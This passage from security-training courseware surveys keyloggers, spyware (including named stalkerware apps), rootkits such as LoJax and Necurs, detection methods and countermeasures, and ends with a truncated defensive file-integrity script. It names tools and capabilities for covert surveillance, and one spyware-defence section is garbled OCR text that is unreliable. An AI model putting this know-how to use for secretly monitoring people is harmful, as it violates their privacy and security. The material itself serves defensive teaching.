These hardware keyloggers monitor and capture the keystrokes of the target system. As these external keyloggers attach between a usual PC keyboard and a computer to record each keystroke, they will remain undetectable by the anti-keyloggers installed on the target system. However, the user can easily detect their physical presence.
Figure 6.106: Different types of hardware keyloggers
Hardware keyloggers come from numerous manufacturers and vendors, some of which are discussed as follows:

* KeyGrabber

Source: https://www.keydemon.com

A KeyGrabber hardware keylogger is an electronic device capable of capturing keystrokes from a PS/2 or USB keyboard. It comes in various forms, such as KeyGrabber USB, KeyGrabber PS/2, and KeyGrabber Nano Wi-Fi.

Figure 6.107: Screenshot of KeyGrabber hardware keylogger
Some hardware keyloggers are listed as follows:

* KeyGrabber USB (http://www.keelog.com)
* KeyCarbon (http://www.keycarbon.com)
* Keyllama Keylogger (https://Keyllama.com)
* Keyboard logger (https://www.detective-store.com)
* KeyGhost (http://www.keyghost.com)
Keyloggers for Windows

Besides the keyloggers mentioned previously, there are many software keyloggers available on the market; you can use these tools to record the keystrokes and monitor the activity of computer users. Some keyloggers are discussed as follows. You can download these tools from their respective websites.

* Spyrix Free Keylogger

Source: http://www.spyrix.com

Spyrix Keylogger Free is used for remote monitoring of a computer, including recording of keystrokes, passwords, and screenshots. The vendor claims that this keylogger is hidden from antivirus, anti-rootkit, and anti-spyware software.

Attackers use the Spyrix Keylogger Free tool to record all the keystrokes on the victim system from a remote system.
Figure 6.108: Screenshot of Spyrix Keylogger

Some of the keyloggers for Windows are listed as follows:

* REFOG Personal Monitor (https://www.refog.com)
* All In One Keylogger (http://www.relytec.com)
* Elite Keylogger (https://www.elitekeyloggers.com)
* StaffCop Standard (https://www.staffcop.com)
* Spytector (https://www.spytector.com)
Keyloggers for Mac

There are various keyloggers available on the market that run on macOS. These downloadable tools can assist an attacker in recording keystrokes and monitoring users' activities. They enable you to record everything the user does on the computer, such as keystroke logging, recording email communication, chat messaging, taking screenshots of each activity, and more. The following keystroke loggers are specifically used on macOS:

* Refog Mac Keylogger

Source: https://www.refog.com

Refog Mac Keylogger provides undetected surveillance and records all the keystrokes on the computer. As shown in the screenshot, attackers use the Refog Mac Keylogger to record all the activities of the target user and steal critical information such as login credentials.
Figure 6.109: Screenshot of Amac Keylogger
Some of the keyloggers for Mac are listed as follows:

* Spyrix Keylogger For Mac OS (http://www.spyrix.com)
* Elite Keylogger for Mac (https://www.elite-keylogger.net)
* Aobo Mac OS X Keylogger (https://www.easemon.com)
* KidLogger for MAC (http://kidlogger.net)
* Perfect Keylogger for Mac (https://www.blazingtools.com)
Spyware

Spyware propagation: drive-by download, piggybacked software installation, web browser vulnerability exploits, and cookies.
Spyware is stealthy computer monitoring software that allows you to secretly record all the user activities on a target computer. It automatically delivers logs to the remote attacker using the Internet (via email, FTP, command and control through encrypted traffic, HTTP, DNS, etc.). The delivered logs include information about all areas of the system, such as emails sent, websites visited, every keystroke (including logins/passwords for Gmail, Facebook, Twitter, LinkedIn, etc.), file operations, and online chat conversations. It also takes screenshots at set intervals, just like a surveillance camera aimed at the computer monitor. Spyware is similar to a Trojan horse, which is usually bundled as a hidden component of freeware or software downloaded from the Internet. It hides its processes, files, and other objects to avoid detection and removal. This allows an attacker to gather information about a victim or organization, such as email addresses, user logins, passwords, credit card numbers, banking credentials, etc.

* Spyware Propagation

As its name implies, spyware is installed without user knowledge or consent, and this can be accomplished by "piggybacking" the spyware onto other applications. Advertising cookies, which are one of the spyware subclasses, spread in the same way. Spyware can also affect your system when you visit a spyware distribution website. Because it installs itself when you visit and click something on a website, this process is known as "drive-by downloading."
What Does the Spyware Do?

We have already discussed spyware and its main function of watching user activities on a target computer. We also know that once an attacker succeeds in installing spyware on a victim's computer using the propagation techniques discussed earlier, they can perform several offensive actions on the victim's computer. Therefore, let us now learn more about the capabilities of spyware, as we are now aware of its ability to monitor user activities.

The installed spyware can also help the attacker perform the following on target computers:

* Steals users' personal information and sends it to a remote server or hijacker
* Monitors users' online activity
* Displays annoying pop-ups
* Redirects a web browser to advertising sites
* Changes the browser's default settings and prevents the user from restoring them
* Adds several bookmarks to the browser's favorites list
* Decreases the overall system security level
* Reduces system performance and causes software instability
* Connects to remote pornography sites
* Places desktop shortcuts to malicious spyware sites
* Steals your passwords
* Sends you targeted email
* Changes the home page and prevents the user from restoring it
* Modifies the dynamically linked libraries (DLLs) and slows down the browser
* Changes firewall settings
* Monitors and reports websites you visit

Types of Spyware

Today, various spyware programs engage in a variety of offensive tasks, such as changing browser settings, displaying ads, collecting data, etc. Though many spyware applications perform a diverse array of benign activities, ten major types of spyware on the Internet allow attackers to steal information about users and their activities, all without their knowledge or consent.
* Desktop Spyware

Desktop spyware is software that allows an attacker to gain information about a user's activity or personal information and send it via the Internet to third parties without the user's knowledge or consent. It provides information regarding what network users did on their desktops, how, and when. Desktop spyware allows attackers to perform the following:

o Live recording of remote desktops
o Recording and monitoring Internet activities
o Recording software usage and timings
o Recording an activity log and storing it at one centralized location
o Logging users' keystrokes
* Email Spyware

Email spyware is a program that monitors, records, and forwards all incoming and outgoing emails. Once installed on the computer that you want to monitor, this type of spyware records copies of all incoming and outgoing emails and sends them to you through a specified email address, or saves the information in a folder on the local disk of the monitored computer. This works in stealth mode; users will not be aware of the presence of email spyware on their computer. It is also capable of recording instant messages (e.g., AIM, MSN, Yahoo, Myspace, Facebook).

* Internet Spyware

Internet spyware is a tool that allows you to monitor all the web pages accessed by users on your computer in your absence. It makes a chronological record of all visited URLs. This automatically loads at system startup and runs in stealth mode, which means that it runs in the background undetected. The tool records all visited URLs into a log file and sends it to a specified email address. It provides a summary report of overall web usage, such as websites visited and the time spent on each website, as well as all applications opened along with the date/time of visits. It also allows you to block access to a specific web page or an entire website by specifying the URLs or keywords that you want to be blocked.
* Child-Monitoring Spyware

Child-monitoring spyware allows you to track and monitor what children are doing on the computer, both online and offline. Instead of looking over the child's shoulder, one can use child-monitoring spyware, which works in stealth mode; your children will not be aware of your surveillance. The spyware logs all programs used and websites visited, counts keystrokes and mouse clicks, and captures screenshots of activity. All the recorded data are accessible through a password-protected web interface as a hidden, encrypted file, or can be sent to a specified email address. This also allows you to protect children from accessing inappropriate web content by setting specific keywords that you want to block. It sends a real-time alert to you whenever it encounters the specified keywords on your computer, or whenever your children want to access inappropriate content.
* Screen-Capturing Spyware

Screen-capturing spyware is a program that allows you to monitor computer activities by taking snapshots or screenshots of the computer on which the program is installed. These snapshots are taken locally or remotely at specified time intervals and either saved in a hidden file on the local disk or sent to an email address or FTP site predefined by the attacker.

Screen-capturing spyware is not only capable of taking screenshots, but also captures keystrokes, mouse activity, visited website URLs, and printer activities, recording computer activities without users' knowledge.

* USB Spyware

USB spyware is a program designed for spying on a computer, which copies spyware files from a USB device onto the hard disk without any request or notification. It runs in hidden mode, so users will not be aware of the spyware or surveillance.

USB spyware provides a multifaceted solution in the province of USB devices, as it can monitor USB devices' activity without creating additional filters, devices, etc. that might damage the structure of the system driver. It helps to monitor children and digital communications, and to find out with whom they are communicating.

The software also allows limiting access to the printer. This log report helps attackers to trace information about sensitive and secret documents that were printed.
* Telephone/Cellphone Spyware

Telephone/cellphone spyware is a software tool that gives you full access to monitor a victim's telephone or cellphone. It will completely hide itself from the user of the phone. It will record and log all activity on the phone, such as Internet use, text messages, and phone calls. Then, you can access the logged information via the software's main website, or you can also receive tracking information through SMS or email. Usually, this spyware helps to monitor and track phone usage of employees. However, attackers are using it to trace information from their target person's or organization's telephones/cellphones. Using this spyware does not require any authorized privileges.

The most common telephone/cellphone spyware features include the following:

o Call History: Allows you to view the entire call history of the phone (both incoming and outgoing calls)
o View Text Messages: Enables you to view all incoming and outgoing text messages. It even shows deleted messages in the log report.
o Website History: Records the entire history of all websites visited through the phone in the log report file.
o GPS Tracking: Shows you where the phone is in real time. There is also a log of the cellphone's location so you can see where the phone has been.

It works as depicted in the following diagram.

Figure 6.110: Telephone/cellphone spyware
* GPS Spyware

GPS spyware is a device or software application that uses the Global Positioning System (GPS) to determine the location of a vehicle, person, or other attached or installed asset. An attacker can use this software to track the target person.

This spyware allows you to track the phone's location points, saving or storing the target user's location points by logging them into a log file and sending them to the specified email address. You can then watch the location points by viewing them in a log, and receive email notifications of location proximity alerts. An attacker traces the location of the target person using GPS spyware, as shown in the following figure.

Figure: GPS spyware (satellite, transmission, power)
Spyware Tools: Spytech SpyAgent and Power Spy
* Spytech SpyAgent

Source: https://www.spytech-web.com

Spytech SpyAgent is computer spy software that allows you to monitor everything users do on your computer, in total secrecy. SpyAgent provides a large array of essential computer monitoring features, as well as website, application, and chat client blocking, logging scheduling, and remote delivery of logs via email or FTP.

As shown in the screenshot, attackers use Spytech SpyAgent to track the websites visited, online searches performed, programs and apps in use, file and printing information, email communication, user login credentials, etc. of the target system.
Figure 6.112: Screenshot of Spytech SpyAgent
* Power Spy

Source: http://ematrixsoft.com

Power Spy is PC-user activity-monitoring software. It runs and performs monitoring secretly in the background of a computer system. It logs all users on the system, and users will not be aware of its existence.

As shown in the screenshots, attackers use this tool to monitor the target system and record all user activities, such as screenshots, keystrokes, applications executed, windows opened, websites visited, chat conversations, documents opened, etc.

Figure: Screenshot of Power Spy
The following is the list of spyware:

* Desktop and Child-Monitoring Spyware

o ActivTrak (https://activtrak.com)
o Veriato Cerebral (http://www.veriato.com)
o NetVizor (https://www.netvizor.net)
o SoftActivity Monitor (https://www.softactivity.com)
o SoftActivity TS Monitor (https://www.softactivity.com)
* USB Spyware

USB spyware monitors and analyzes data transferred between any USB device connected to a computer as well as its applications. It helps in application development, USB device drivers, or hardware development and offers a powerful platform for effective coding, testing, and optimization.

The following is a list of USB spyware:

o USB Analyzer (https://www.eltima.com)
o USB Monitor (https://www.hhdsoftware.com)
o USBDeview (https://www.nirsoft.net)
o Advanced USB Port Monitor (https://www.aggsoft.com)
o USB Monitor Pro (http://www.usb-monitor.com)
* Audio Spyware

Audio spyware helps to monitor sound and voice recorders on the system. It invisibly starts recording once it detects sound and automatically stops recording when the voice disappears. It can be used in recording conferences, monitoring phone calls, radio broadcasting logs, spying, employee monitoring, etc.

The following is the list of audio spyware:

o Spy Voice Recorder (http://www.mysuperspy.com)
o Spy Audio Listening Device (https://www.securityplanet.co)
o Spy USB Voice Recorder (https://www.securityplanet.co)
o Voice Activated Flash Drive Voice Recorder (https://www.spytec.com)
o Snooper Audio Spyware (https://www.snooper.se)
* Video Spyware

Video spyware is used for secret video surveillance. An attacker can use this software to secretly monitor and record webcams and video IM conversations. An attacker can use video spyware to remotely view webcams to obtain live footage of secret communication. Using this spyware, attackers can record and replay anything displayed on the victim's screen.

The following is a list of video spyware:

o Movavi Video Editor (https://www.movavi.com)
o Free2x Webcam Recorder (http://www.free2x.com)
o iSpy (https://www.ispyconnect.com)
o NET Video Spy (https://www.sarbash.com)
o Eyeline Video Surveillance Software (https://www.nchsoftware.com)
* Cellphone Spyware

Like Mobile Spy, an attacker can also use the following software programs as telephone/cellphone spyware to record all activities on a phone, such as Internet usage, text messages, and phone calls.

Some of the available telephone/cellphone spyware programs are as follows:

o Phone Spy (https://www.phonespysoftware.com)
o XNSPY (https://xnspy.com)
o iKeyMonitor (https://ikeymonitor.com)
o OneSpy (https://www.onespy.in)
o TheTruthSpy (https://thetruthspy.com)
* GPS Spyware

Various software programs act as GPS spyware to trace the location of particular mobile devices. Attackers can also employ the following GPS spyware software to track the location of the target mobile devices.

Some examples of GPS spyware programs are listed as follows:

o Spyera (https://spyera.com)
o mSpy (https://www.mspy.com)
o MOBILE SPY (http://www.mobile-spy.com)
o Mobistealth (https://www.mobistealth.com)
o FlexiSPY (https://www.flexispy.com)
How to Defend against Keyloggers
* Recognize phishing emails and delete them.
* Regularly update and patch system software.
* Do not click on links in unsolicited or dubious emails that may direct you to malicious sites.
* Use keystroke interference software that inserts randomized characters into every keystroke.
* Antivirus and anti-spyware software can detect installed keylogging software, but it is better to detect these programs before installation. Scan files thoroughly before installing them onto the computer, and use a registry editor or process explorer to check for keystroke loggers.
* Use the Windows on-screen keyboard accessibility utility to enter a password or any other confidential information. Use your mouse to enter information such as passwords and credit card numbers into the fields, instead of typing them with the keyboard. This protects against keyloggers that hook the keyboard; it does not defeat form-grabbing or screen-capturing keyloggers, which read the completed field or the screen.
* Use an automatic form-filling password manager or a virtual keyboard to enter usernames and passwords, as this will avoid exposure through keyboard-hooking keyloggers. An automatic form-filling password manager removes the need to type your personal, financial, or confidential details, such as credit card numbers and passwords, via the keyboard.
* Keep your hardware systems secure in a locked environment, and frequently check the keyboard cables, connectors, and USB and PS/2 ports for attached devices that may have been used to install a keylogger.
* Use software that frequently scans and monitors changes in your system or network.
* Install a host-based IDS, which can monitor your system and disable the installation of keyloggers.
* Use one-time passwords (OTP) or other authentication mechanisms such as two-step or multi-step verification to authenticate users.
* Enable application whitelisting to block downloading or installing of unwanted software such as keyloggers.
* Use a VPN to enable an additional layer of protection through encryption.
* Use process-monitoring tools to detect suspicious processes and system activities.
* Regularly patch and update software and the OS.
Hardware Keylogger Countermeasures

* Restrict physical access to sensitive computer systems.
* Periodically check your keyboard interface to ensure that no extra components are plugged into the keyboard cable connector.
* Use encryption between the keyboard and its driver.
* Use an anti-keylogger that detects the presence of a hardware keylogger such as KeyGrabber.
* Use an on-screen keyboard and click on it using a mouse.
* Periodically check the video monitor cables to detect the presence of hardware keyloggers.
* Set up video surveillance around the computer desk to detect plugging in of malicious hardware.
* Disable USB ports, or set up advanced BIOS authentication mechanisms to enable USB ports.
Anti-Keyloggers

Anti-keyloggers, also called anti-keystroke loggers, detect and disable keystroke logger software. The special design of these tools helps them to detect software keyloggers. Many large organizations, financial institutions, online gaming industries, and individuals use anti-keyloggers to protect their privacy while using systems. This software prevents a keylogger from logging every keystroke typed by the victim, and thus keeps all personal information safe and secure. An anti-keylogger scans a computer and detects and removes keystroke logger software. If the anti-keylogger finds any keystroke-logging program on your computer, it immediately identifies and removes the keylogger, whether it is legitimate or illegitimate.

Some anti-keyloggers detect the presence of hidden keyloggers by comparing all files in the computer against a signature database of keyloggers and searching for similarities. Others detect the presence of hidden keyloggers by protecting keyboard drivers and kernels from manipulation. A virtual keyboard or touchscreen makes the task of keystroke capturing by malicious spyware or Trojan programs difficult. Anti-keyloggers secure your system from spyware and keyloggers.

* Zemana AntiLogger

Source: https://www.zemana.com

Zemana AntiLogger is a software application that blocks attackers. It detects any attempts to modify your computer's settings, record your activities, hook into your PC's sensitive processes, or inject malicious code into your system. The AntiLogger detects the malware at the time it attacks your system, rather than detecting it based on its signature fingerprint.
Figure 6.115: Screenshot of Zemana AntiLogger
Some examples of anti-keyloggers are listed as follows:

* GuardedID (https://www.strikeforcecpg.com)
* KeyScrambler (https://www.qfxsoftware.com)
* Oxynger KeyShield (https://www.oxynger.com)
* Ghostpress (https://schiffer.tech)
* SpyShelter Free Anti-Keylogger (https://www.spyshelter.com)
How to Defend against Spyware

Spyware is any malicious program installed on a user's system without their knowledge. It gathers confidential information such as personal data and access logs. Spyware can originate from three basic sources: free downloaded software, email attachments, and websites that automatically install spyware when you browse them.

Different ways to defend against spyware are as follows:

* Try to avoid using any computer system that you do not have complete control over.
* Never adjust your Internet security setting level too low, because it provides many chances for spyware to be installed on your computer. Therefore, always set your Internet browser security settings to either high or medium to protect your computer from spyware.
* Do not open suspicious emails and file attachments received from unknown senders. There is a high likelihood that you will allow a virus, freeware, or spyware onto the computer. Do not open unknown websites linked in spam mail messages, retrieved by search engines, or displayed in pop-up windows, because they may mislead you into downloading spyware.
* Enable a firewall to enhance the security level of your computer.
* Regularly update the software, and use a firewall with outbound protection.
* Regularly check Task Manager and MS Configuration Manager reports.
* Regularly update virus definition files and scan the system for spyware.
software.
Installanti-spyware Anti-spyware is thefirstline of defenseagainst
spyware.
Thissoftwarepreventsspyware from installing
on your system. It periodically
scans and
protectsyoursystemfromspyware.
Keep yourOSup to date.
© Windowsusers shouldperiodically
perform or Microsoftupdate.
a Windows
>
refer
For users of otherOSsor softwareproducts,to the informationgivenbythe OS
andtakeessentialstepsagainstanyvulnerability
vendors, identified.
Performweb surfing
safely
anddownloadcautiously.
Beforedownloading
any software, ensure that it is from a trustedwebsite.Readthe
licenseagreement,
security warning,and privacystatements associated with the
softwarethoroughly
to gain a clearunderstanding beforedownloading it.
Beforedownloadingfreewareor sharewarefrom a website, ensure that the site is
be cautious with softwareprogramsobtained through
safe. Likewise, P2Pfile-
swappingsoftware.Beforeinstallingsuchprograms,perform a scan usinganti
spywaresoftware.
not
Do use administrativemodeunlessit is necessary,
becauseit mayexecute malicious
programssuchas spyware i n administratormode.Consequently, attackersmaytake
complete
Donot
control
of
your system.
downloadfree musicfiles,screensavers,or emoticons fromthe Internetbecause
whenyoudo,thereis a possibilitythat are downloadingspywarealong with them.
- Beware of pop-up windows or web pages. Never click anywhere on windows that display messages such as "your computer may be infected," or claim that they can help your computer to run faster. If you click on such windows, your system may become infected with spyware.
- Carefully read all disclosures, including the license agreement and privacy statement, before installing any application.
- Do not store personal or financial information on any computer system that is not totally under your control, such as in an Internet café.
Anti-Spyware
There are many anti-spyware applications available on the market, which scan your system and check for spyware such as malware, Trojans, dialers, worms, keyloggers, and rootkits and remove them if found. Anti-spyware provides real-time protection by scanning your system at regular intervals, either weekly or daily. It scans to ensure that the computer is free from malicious software.
SUPERAntiSpyware
Source: https://www.superantispyware.com
SUPERAntiSpyware is a software application that can detect and remove spyware, adware, Trojan horses, rogue security software, computer worms, rootkits, parasites, and other potentially harmful software applications.
Figure 6.126: Screenshot of SUPERAntiSpyware
Some examples of anti-spyware programs are listed as follows:
- Kaspersky Internet Security 2019 (https://support.kaspersky.com)
- SecureAnywhere Complete Internet Security (https://www.webroot.com)
- adaware antivirus free (https://www.adaware.com)
- MacScan (https://www.securemac.com)
- Norton AntiVirus Plus (https://us.norton.com)
Hiding Files
After an attacker has performed malicious operations (i.e., executed malicious applications) on a target system to gain escalated privileges, he/she embeds and hides his/her malicious programs. The attacker can do this using rootkits, NTFS streams, steganography techniques, etc. to prevent the malicious program from being detected by protective applications such as antivirus, anti-malware, and anti-spyware applications installed on the target system. Such a hidden malicious file allows the attacker to maintain direct access to the system, even in the future, without the victim's consent. This section describes various techniques used by attackers to hide their malicious files.
Rootkits
Rootkits are software programs designed to gain access to a computer without being detected. They are malware that help attackers gain unauthorized access to a remote system and perform malicious activities. The goal of a rootkit is to gain root privileges to a system. By logging in as the root user of a system, an attacker can perform various tasks such as installing software or deleting files. It works by exploiting the vulnerabilities in the OS and its applications. It builds a backdoor login process in the OS via which the attacker can evade the standard login process.
Once root access has been obtained, a rootkit may attempt to hide the traces of unauthorized access by modifying drivers or kernel modules and concealing active processes. Rootkits replace certain OS calls and utilities with their own modified versions of those routines that, in turn, undermine the security of the target system by executing malicious functions. A typical rootkit comprises backdoor programs, DDoS programs, packet sniffers, log-wiping utilities, IRC bots, and others.
All files contain a set of attributes. There are different fields in the file attributes. The first field determines the format of the file, i.e., whether it is a hidden, archive, or read-only file. The other fields describe the time of the file's creation and last access, and its original length. The Windows API functions GetFileAttributesExA() and GetFileInformationByHandle() are used to read these attributes. ATTRIB.exe displays or changes the file attributes. An attacker can hide files or even change the attributes of a victim's files so that the attacker can access them.
The attacker places a rootkit by:
- Scanning for vulnerable computers and servers on the web
- Wrapping it in a special package, like a game
- Installing it on public or corporate computers through social engineering
- Launching a zero-day attack (privilege escalation, Windows kernel exploitation, etc.)
Objectives of a rootkit:
- To root the host system and gain remote backdoor access
- To mask attacker tracks and the presence of malicious applications or processes
- To gather sensitive data, network traffic, etc. from the system for which attackers might be restricted or have no access
- To store other malicious programs on the system and act as a server resource for bot updates
Types of Rootkits
A rootkit is a type of malware that can hide itself from the OS and antivirus applications on a computer. This program provides the attackers with root-level access to the computer through backdoors. These rootkits employ a range of techniques to gain control of a system. The type of rootkit influences the choice of attack vectors.
- Hypervisor-Level Rootkit: This kind of rootkit acts as a hypervisor and modifies the system's boot sequence so that it is loaded instead of the original virtual machine monitor. The host OS then runs as a virtual machine, and the rootkit intercepts all hardware calls made by it.
- Hardware/Firmware Rootkit: Hardware/firmware rootkits use devices or platform firmware to create a persistent malware image in hardware, such as a hard drive, system BIOS, or network card. The rootkit hides in firmware because users do not inspect it for code integrity. A firmware rootkit thus amounts to creating a permanent, concealed installation of rootkit malware.
- Boot-Loader-Level Rootkit: Boot-loader-level rootkits (bootkits) function either by modifying the legitimate boot loader or replacing it with another one. The bootkit can activate even before the OS starts. Therefore, bootkits are serious threats to security because they facilitate the hacking of encryption keys and passwords.
- Application-Level/User-Mode Rootkit: An application-level/user-mode rootkit runs in Ring 3 as a user along with other applications in the system. It exploits the standard behavior of APIs. It operates inside the victim's computer by replacing the standard application files (application binaries) with rootkits or by modifying the behavior of present applications with patches, injected malicious code, etc.
- Library-Level Rootkits: Library-level rootkits work high up in the OS, and they usually patch, hook, or supplant system calls with backdoor versions to keep the attacker unknown. They replace the original system calls with fake ones to hide information about the attacker.
How a Rootkit Works
System hooking is the process of changing and replacing the original function pointer with a pointer provided by the rootkit in stealth mode. Inline function hooking is a technique in which a rootkit changes some of the bytes of a function inside the core system DLLs (kernel32.dll and ntdll.dll), placing an instruction so that any process calls hit the rootkit first.
Figure 6.117: Working of rootkit
Direct kernel object manipulation (DKOM) rootkits can locate and manipulate the "system" process in kernel memory structures and patch it. This can also hide processes and ports, change privileges, and misguide the Windows event viewer without any problem by manipulating the list of active processes of the OS, thereby altering data inside the process identifier structures. It can obtain read/write access to the \Device\PhysicalMemory object. It hides a process by unlinking it from the process list.
Popular Rootkits
The following are some of the most popular rootkits:
LoJax
Source:https://www.welivesecurity.com
LoJax is a UEFI rootkit that attackers have used to perform cyber-attacks. LoJax is created to inject malware into the system and is automatically executed whenever the system starts up. It exploits UEFI, which acts as an interface between the OS and the firmware. It is extremely challenging to detect LoJax as it evades traditional security controls and maintains its persistence even after OS reinstallation or hard disk replacement. LoJax uses a collection of tools to access and modify the system's UEFI/BIOS settings.
The functions performed by these tools include the following:
- Collect all settings of the system and save them in a text file
- Access the contents of the system's Serial Peripheral Interface (SPI) flash memory, where the UEFI/BIOS is located, and save it as a firmware image
- Embed a malicious UEFI module (rootkit) into the firmware image and then write the firmware image back to the SPI flash memory
Figure 6.118: Screenshot 1 of LoJax
Figure 6.119: Screenshot 2 of LoJax
Scranos
Source: https://www.bitdefender.com
Scranos is a trojanized rootkit that masquerades as cracked software or a legitimate application, such as anti-malware, a video player, or an ebook reader, to infect systems and perform data exfiltration that damages the reputation of the target and steals intellectual property. When this rootkit is executed, a rootkit driver is automatically installed, which then starts installing other malicious components into the system. Apart from installing malicious components, Scranos also interacts with various websites on behalf of the victim. The operations performed by the Scranos dropper and rootkit are as follows:
- The dropper steals critical information such as login credentials, cookies, and payment information using specialized DLLs and sends the data back to a command and control (C&C) server.
- The dropper installs a rootkit into the system.
- The rootkit registers a shutdown callback to achieve persistence. At shutdown, the driver is written to disk, and a start-up service key is created in the registry.
- The rootkit injects a downloader into an svchost.exe process.
- The downloader sends some information about the system to the C&C and receives download links.
- Payloads are downloaded and executed automatically.
Figure 6.121: Screenshot 2 of Scranos
Horse Pill
Source: http://www.pill.horse
Horse Pill is a proof of concept of a ramdisk-based containerizing rootkit. It resides inside "initrd," and before the actual init starts running, it puts it into a mount and PID namespace that allows it to run covert processes and storage. This also allows it to run covert networking systems, such as DNS tunnels.
Figure 6.123: Screenshot 2 of Horse Pill rootkit
It has three important moving parts, which are as follows:
- klibc-horsepill.patch: This is a patch to klibc that provides run-init, which on modern Ubuntu systems runs the real init, systemd. This patches in the rootkit functionality and creates a malicious run-init. This binary has a new section called DNSCMDLINE, which provides command-line options to the dnscat bundled within the patch.
- horsepill_setopt: This script takes in command-line arguments and puts them into the section mentioned above.
- horsepill_infect: This takes the file to splat over run-init while assembling ramdisks as a command-line argument. It then calls update-initramfs and splats over the run-init as the ramdisks are being assembled.
Necurs
Source: https://www.f-secure.com
Necurs is a kernel-mode driver component that can be used by an attacker (or added as a component to another malicious program) to perform unauthorized actions to take control of an OS, without alerting the system's security mechanisms. Necurs contains backdoor functionality, which allows remote access and control of the infected computer. It also allows the monitoring and filtering of network activity and has been observed to send spam and install rogue security software. It enables further compromise by providing the functionality to do the following:
- Download additional malware
- Hide its components
- Stop security applications from functioning
Figure 6.124: Screenshot 1 of Necurs rootkit
Figure 6.126: Screenshot 3 of Necurs rootkit
Some examples of popular rootkits are listed as follows:
- Azazel
- Sirefef
- Wingbird Rootkit
- Avatar
- GrayFish
- ZeroAccess
Detecting Rootkits
We have seen how attackers employ various rootkits to hide files and their presence on the target system. Now, let us discuss various rootkit detection methods from a security perspective. In general, rootkit detection techniques can be categorized into signature-based, heuristic-based, integrity-based, cross-view-based, and runtime execution path profiling.
Integrity-Based Detection
Integrity-based detection can be regarded as a substitute for both signature-based and heuristic-based detection. Initially, the user runs tools such as Tripwire and AIDE on a clean system. These tools create a baseline of clean system files and store it in a database. Integrity-based detection functions by comparing a current filesystem, boot records, or memory snapshot with that trusted baseline. It detects the evidence or presence of malicious activity based on dissimilarities between the current and baseline snapshots.
Signature-Based Detection
Signature-based detection methods work as rootkit fingerprints. They compare the characteristics of all system processes and executable files with a database of known rootkit fingerprints. It can compare a sequence of bytes from a file with another sequence of bytes that belong to a malicious program. The method mostly scans system files. It can also detect hidden rootkits by scanning the kernel memory. The success of signature-based detection is lower owing to the rootkit's tendency to hide files by interrupting the execution path of the detection software.
Heuristic/Behavior-Based Detection
Heuristic-based detection works by identifying deviations in normal OS patterns or behaviors. This type of detection is also known as behavioral detection. Heuristic detection can identify new, previously unidentified rootkits by recognizing deviations in "normal" system patterns or behaviors. Execution path hooking is one such deviation that helps heuristic-based detectors identify rootkits.
Runtime Execution Path Profiling
The runtime execution path profiling technique compares the runtime execution path profiles of all system processes and executable files. A rootkit adds new code near a routine's execution path to destabilize it. The method hooks several instructions executed before and after a certain routine, as these can be significantly different.
Cross-View-Based Detection
Cross-view-based detection techniques function by assuming that the OS has been, in a way, subverted. This technique enumerates the system files, processes, and registry keys by calling common APIs. The tools compare the gathered information with the data set obtained using an algorithm to traverse through the same data. This detection technique relies on the fact that API hooking or manipulation of kernel data structures taints the data returned by the OS APIs, whereas the low-level mechanisms used to obtain the same information are free from DKOM or hook manipulation; any difference between the two views reveals the rootkit.
Alternative Trusted Medium
The alternative trusted medium technique is the most reliable method used for detecting rootkits at the OS level. In this technique, the infected system is shut down and then booted from alternative trusted media, such as a bootable CD-ROM or USB flash drive. After booting, the OS storage is checked to find traces of the rootkit, which can further be removed, to restore the system to its normal state.
Analyzing Memory Dumps
In memory dump analysis, the volatile memory (RAM) of the suspected system is dumped and analyzed to detect the rootkit in the system. Using this technique, one can create a static snapshot of a single process, the system kernel, or the entire system. To detect a rootkit, the entire system memory is dumped to analyze and capture active rootkits. This memory dump can further be used to perform offline forensic analysis. Creating memory dumps may require specialized hardware.
Steps for Detecting Rootkits
There are many tools available on the market that can be used to detect the presence of rootkits on a target system. However, sometimes, tools are inadequate as the malware writers always find ways to counter these automated rootkit detectors, and some of their latest efforts are even able to evade them. Therefore, it is better to manually detect a rootkit. Manual detection of rootkits requires time, patience, perseverance, and expertise. Manually examine the filesystem and registry of the system to detect rootkits.
Steps to detect rootkits by examining the filesystem are as follows:
1. Run "dir /s /b /ah" and "dir /s /b /a-h" inside the potentially infected OS and save the results.
2. Boot into a clean CD, run "dir /s /b /ah" and "dir /s /b /a-h" on the same drive, and save the obtained results.
3. Run a clean version of WinMerge on the two sets of results to detect file-hiding ghostware (i.e., files invisible from inside the running OS but visible from outside it).
How to Defend against Rootkits
A common feature of these rootkits is that the attacker requires administrator access to the target system. The initial attack that leads to this access is often noisy. Therefore, one should monitor the excess network traffic that arises in the face of a new exploit. It is obvious that log analysis is an important component of risk management. The attacker may have shell scripts or tools that can help him/her cover his/her tracks, but there will almost certainly be other telltale signs that can lead to proactive countermeasures, not just the reactive ones.
A reactive countermeasure is to back up all critical data, excluding the binaries, and perform a fresh, clean installation from a trusted source. One can perform code checksumming as a good defense against tools like rootkits. MD5sum.exe can fingerprint files and note integrity violations when changes occur (a SHA-256 tool should be preferred today, as MD5 is no longer collision resistant). To defend against rootkits, integrity checking programs should be used for critical system files.
A few techniques adopted to defend against rootkits are as follows:
- Reinstall OS/applications from a trusted source after backing up critical data
- Maintain well-documented automated installation procedures
- Perform kernel memory dump analysis to determine the presence of rootkits
- Harden the workstation or the server against the attack
- Educate staff not to download any files/programs from untrusted sources
- Install network- and host-based firewalls and frequently check for updates
- Ensure the availability of trusted restoration media
- Update and patch applications, OSs, and firmware
- Regularly verify the integrity of system files using cryptographically strong digital fingerprint technologies
- Regularly update antivirus and anti-spyware software
- Keep anti-malware signatures up to date
- Avoid logging into an account with administrative privileges
- Adhere to the least privilege principle
- Ensure that the chosen antivirus software possesses rootkit protection
- Do not install unnecessary applications, and disable the features and services not in use
- Refrain from engaging in dangerous activities on the Internet
- Close any unused ports
- Periodically scan the local system using host-based security scanners
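The integrity-based detection method described earlier (a baseline of file fingerprints taken on a clean system, compared against the live system) and the bullet above on verifying system files with cryptographically strong fingerprints are both shown in the following added example. It is not code from the courseware or from Tripwire/AIDE: snapshot() walks a directory tree and records a SHA-256 fingerprint per file, and compare() diffs a later snapshot against the stored baseline. The directory layout, the "system files" and the simulated rootkit tampering are all constructed inside a temporary directory so the script runs offline. The same compare() also covers the manual listing comparison from the detection steps: a file that a rootkit hides from the live view lands in the "removed" set.

```python
"""Integrity-based rootkit detection: baseline fingerprints vs. a later snapshot.

Added example (not from the courseware). Paths, sample files and the simulated
tampering below are constructed for the demo.
"""
import hashlib
import json
import os
import tempfile
from pathlib import Path


def fingerprint(path: Path) -> dict:
    """SHA-256 plus size and permission bits for one regular file."""
    digest = hashlib.sha256()
    with open(path, "rb") as fh:
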